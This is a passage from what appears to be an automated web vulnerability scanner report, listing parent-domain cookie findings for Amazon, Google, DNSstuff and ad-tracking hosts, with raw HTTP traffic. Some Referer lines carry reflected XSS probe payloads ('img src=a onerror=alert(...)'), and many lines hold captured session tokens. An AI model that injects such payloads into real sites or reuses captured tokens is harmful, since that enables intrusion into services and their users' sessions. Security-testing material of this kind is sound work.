Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.5. http://cts-log.channelintelligence.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cts-log.channelintelligence.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?vid=11303&eid=13&tid=null&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: cts-log.channelintelligence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: serverstamp=6E83F16D%2D7868%2D492A%2DACC1%2D953E4F625CFC

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:59:28 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=07F7194A-0651-B07C-1DBA-0428733D08BC;Domain=.channelintelligence.com;Expires=Mon, 18-Jul-11 13:59:28 GMT
Cache-Control: private,no-store
Content-Length: 42
pragma: no-cache
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Via: 1.1 bfi061001 (MII-APC/2.0)

GIF89a.............!.......,........@..D.;

9.6. http://wireless.amazon.com/a

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /a

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wireless.amazon.com/alohaCartRequest?appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=1001076487%3Cimg%20src%3da%20onerror%3dalert(1)%3E66af90f3644d32ac9&type=BUNDLE
Cookie: session-id=175-2289931-3243538; session-id-time=1311599127l; ubid-main=188-9421442-7636565; session-token="g5MNmYG+8nWRZ8LG+IOSp1IkH1q+UWtxSVVA/fYm/bDm2BUyDOn97BLd4HDfnpufFh49AwGKfEMoABAshxomL5aFUqZOZcNz/nR2T6GhnRlXI/pu+0O0wLh+f2AdMEo0+21WTNItbxbohlDmhXeiaJ2IZjWTiBh2uz5vqT604l5gYwuYwf25ruyU9JnoYaMwd9e4l/Qd3atVmxfVYWuPHg=="

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 13:06:02 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:06:02 GMT; Path=/
Set-Cookie: session-token="/SjeTlLmF0RGRITXVYKNKwZCHH347C5P7eCELpGkH6YBweSZFJbTcVh5cBOJSfwHgrYso+8dozzOgEcuyUdx73ordDZtBLVmWg2BxE9QSvNxroj26vS0/yLrNdMvIERhqgW/JkBrtT3hVfC46LzioLcXzBXMMM/UaFsUhjoZ99gmR3JeFHDRiJVFscahbefgpvi/ex2p14mu99fss3m+Vw=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:16:02 GMT; Path=/
Content-Length: 8722


<html>

<head>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<script type='text/javascript'>/* <![CDATA[ */
var t0_date = new Date();
var ue_t0 = t0_date.getTime();
var ue_id = '0J
...[SNIP]...

9.7. http://wireless.amazon.com/alohaCartRequest

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /alohaCartRequest

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /alohaCartRequest HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW
Content-Length: 156
Cookie: session-id=179-2761153-4689763; session-id-time=1311598655l
Pragma: no-cache
Cache-Control: no-cache

appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=10010&type=BUNDLE

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:24 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:01:25 GMT; Path=/
Set-Cookie: session-token="lnKPRD6kZzjcbPBJWWQArMIY660yC2fMiO2Jjs3zjOMF3pc56fdl3iPvsnfsHah2m9lQiQnN6DrjSL/fSlXoqfdfXgkPKYJvJWedfhOppEHBLtxWUbPVnwnHnokBcL5Y3N03P0n2/aCay5IpRT7173LYyddWUsd8V7XxgcylDevao7MTfb2qyx5Jw6EmwuLZsu2xXnBQEKlTgqmTJ00+aQ=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:11:25 GMT; Path=/
Content-Length: 1450


{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_PLAN","url":"/b/684182011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":true,"compatibil
...[SNIP]...

9.8. https://adwords.google.com/um/StartNewLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=EP-s7bNspEBUnJAP5n9CoQ; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 14
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2011 02:15:50 GMT
Expires: Mon, 18 Jul 2011 02:15:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

9.9. http://akamai.invitemedia.com/set_partner_uid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=199&partnerUID=5F412CC6BA08FD67AA4CC75A0057DA25&sscs_active=1&rurl=4-X2+JIus5OZhrmFIdBs45CYOmKlhG+eZHwUPu4QYWQIvspic+jfcHfQYXqaPpRy030%2fyydVdk1%2f%2fiRE9ZNKYu+uaBc4Ict+6a4jayXS5As6Hgc9gso9XbXeFraCkV8MSnB59Vz3sB31vJ9Qg4OFFuTV+a041ly8rq60spsKEyrApjw0tuGBZu+g%3d%3d&V=3-mtXuJuM%2fvsxM0z5elCSjCr6HXiomqTwDyN9Vx0x8OLV5cRKh288IaV5pjGN+Aa3j HTTP/1.1
Host: akamai.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXX0="

Response

HTTP/1.1 302 Moved Temporarily
Server: IM BidManager
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: image/gif
Content-Length: 43
Expires: Mon, 18 Jul 2011 13:01:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Jul 2011 13:01:27 GMT
Connection: close
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 17-Jul-2012 13:01:27 GMT; Path=/
Location: http://cache.vzw.com/images_b2c/mediagallery/exploreFeatures.gif?01RI=04B3966EF2E4199&01CM=cm:akamai.invitemedia.com&01NA=ck&

GIF89a.............!.......,...........D..;

9.10. http://ibid2252027210.peachd.dnsstuff.com/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid2252027210.peachd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid2252027210.peachd.dnsstuff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 02:16:34 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003775; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.11. http://ibid2252027210.plumd.dnsstuff.com/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid2252027210.plumd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid2252027210.plumd.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 02:04:30 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003861; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.12. http://ibid4216487243.plumd.dnsstuff.com/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid4216487243.plumd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid4216487243.plumd.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 01:58:42 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003861; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.13. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: SNID=49=n94NMJwrzLSil-Hbv9BZR6WcCUH53BkjIxqJL0k2wA=uulSFr7fDxkDHIHz; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=AJdW8VAQq0J6jw3LHkdtuSzjOE_qZMzJAZIUTY39X2VsgslDP9tF8cB5Y274660NagMFmiGz-PELt3Z3HRk05Q1bpWqP8M8bttRF0mwTL5dNSfwHPa6dFhWywSQeHY_u

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; expires=Tue, 17-Jan-2012 01:58:52 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 18 Jul 2011 01:58:52 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.14. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=AJdW8VAQq0J6jw3LHkdtuSzjOE_qZMzJAZIUTY39X2VsgslDP9tF8cB5Y274660NagMFmiGz-PELt3Z3HRk05Q1bpWqP8M8bttRF0mwTL5dNSfwHPa6dFhWywSQeHY_u

Response

HTTP/1.1 200 OK
Set-Cookie: NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-; expires=Tue, 17-Jan-2012 02:04:39 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 18 Jul 2011 02:04:39 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.15. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=134&fmt=redir&sec=0&pid=prod&UAT=catName=Mobile%20Plans|parentCatName=%parentCatName%|uberCatName=%uberCatName%|skuId=%skuId%|productId=%prodId%&catId=pcmcat203600050025&parentCatId=%parentCatId%&uberCatId=%uberCatId% HTTP/1.1
Host: int.teracent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257
Cookie: uid=N357qbE.X2PexF; imp=a$le#1309257444602_119555616_ap2105_int|; p206r=b$u-28#P.7pR|c-4024#5.7pR|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p134r=b$u-89#A.7xD|c-pcmcat203600050025#2.7xD|p-prod#2.7xD|; Domain=.teracent.net; Expires=Sat, 14-Jan-2012 12:59:29 GMT; Path=/
Set-Cookie: imp=a$le#1310993969243_14640073_ap2101_int|; Domain=.teracent.net; Expires=Sat, 14-Jan-2012 12:59:29 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 18 Jul 2011 12:59:28 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.16. http://picasaweb.google.com/lh/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Mon, 18 Jul 2011 02:20:35 GMT
Date: Mon, 18 Jul 2011 02:20:35 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=SPFBb7O7kkKm; Path=/; HttpOnly
Set-Cookie: S=photos_html=ZtHhGu3O2OSAPyEaExQ31A; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

9.17. http://sales.liveperson.net/hc/44153975/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/44153975/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/44153975/?lpCallId=660732486522-110148310186&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=593087268&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=northeast-consumer-english%7ClpMTagConfig.dbDual%7Clpchatdynamicbuttondiv%7C&cookie=GLOBALID%3DU0rDszSw9SV68cj1hODGnDTHalYNM%252FB%252FuJn%252B7rVAcc%252Fc6GD2xpZ0%252Bs4Orh8A1O1u%3B%20mbox%3DPC%231310569554435-90226.17%231312204729%7Csession%231310993870949-319721%231310996989%7Ccheck%23true%231310995189%3B%20CP%3Dnull*%3B%20__utma%3D96859928.1761841238.1310569615.1310569615.1310993885.2%3B%20__utmz%3D96859928.1310993885.2.2.utmccn%3D%28referral%29%7Cutmcsr%3Dfakereferrerdominator.com%7Cutmcct%3D/referrerPathName%7Cutmcmd%3Dreferral%3B%20%20SESSION_VALUE%3Dm2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy%21-1801843931%21mercury%215102%21-1%211310993856497%3B%20TIME_CHECKER%3D1310993856500%3B%20gnVersion%3D2011Jul12104957%3B%20__utmb%3D96859928%3B%20__utmc%3D96859928%3B%20chkcookie%3D1310993892258%3B%20CARTVIEW%3DFALSE%3B%20ZIPCODE%3D10010%3B%20CITY%3DNew%20York%3B%20STATE%3DNY%3B%20devicePageView%3Dlist HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: LivePersonID=-16601155425835-1310995042:-1:-1:-1:-1; HumanClickKEY=3782573678164176424; HumanClickSiteContainerID_44153975=Master; LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1310995080123

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:19:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310995140955; expires=Tue, 19-Jul-2011 13:19:00 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 18 Jul 2011 13:19:00 GMT
